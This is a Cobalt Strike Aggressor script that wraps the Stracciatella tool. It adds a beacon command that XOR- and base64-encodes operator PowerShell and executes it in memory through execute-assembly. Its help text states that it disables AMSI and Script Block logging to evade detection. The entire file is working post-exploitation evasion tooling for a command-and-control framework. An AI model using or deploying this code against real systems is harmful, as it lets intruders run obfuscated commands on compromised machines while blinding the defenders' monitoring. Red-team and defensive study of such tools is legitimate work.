#
# Stracciatella wrapper for Cobalt Strike 4.0+
#
# Author:
#   Mariusz B. / mgeeky, '20
#   (https://github.com/mgeeky)
#

$STRACCIATELLA_PATH = getFileProper(script_resource("modules"), "stracciatella.exe");

beacon_command_register(
    "stracciatella",
    "Runs mgeeky/Stracciatella Powershell runspace being even safer version of powerpick.",
    "Use: stracciatella [-v] command\n\nDescription: Runs Stracciatella in a similar fashion to powerpick/powershell.\nIf '-v' is given, will result in verbose output from Stracciatella.\nThat will create a Powershell Runspace with Script Block logging and AMSI disabled for better OPSEC.");

alias stracciatella {
    local('$args $opts $key $enc $verbose');
    
    # $0 is the entire command with no parsing.
    $args = substr($0, strlen("stracciatella "));

    $verbose = "";
    if ('stracciatella -v *' iswm $0) {
    	$verbose = "-v ";
    	$args = substr($0, strlen("stracciatella -v "));
    }

    $key = rand(254) + 1;
    
    # encode our download cradle AND cmdlet+args we want to run
    $enc = base64_encode(str_xor($args, chr($key)));

    $opts = "$verbose $+ -x $key -e -c \" $+ $enc $+ \"";

    bexecute_assembly($1, $STRACCIATELLA_PATH, $opts);
}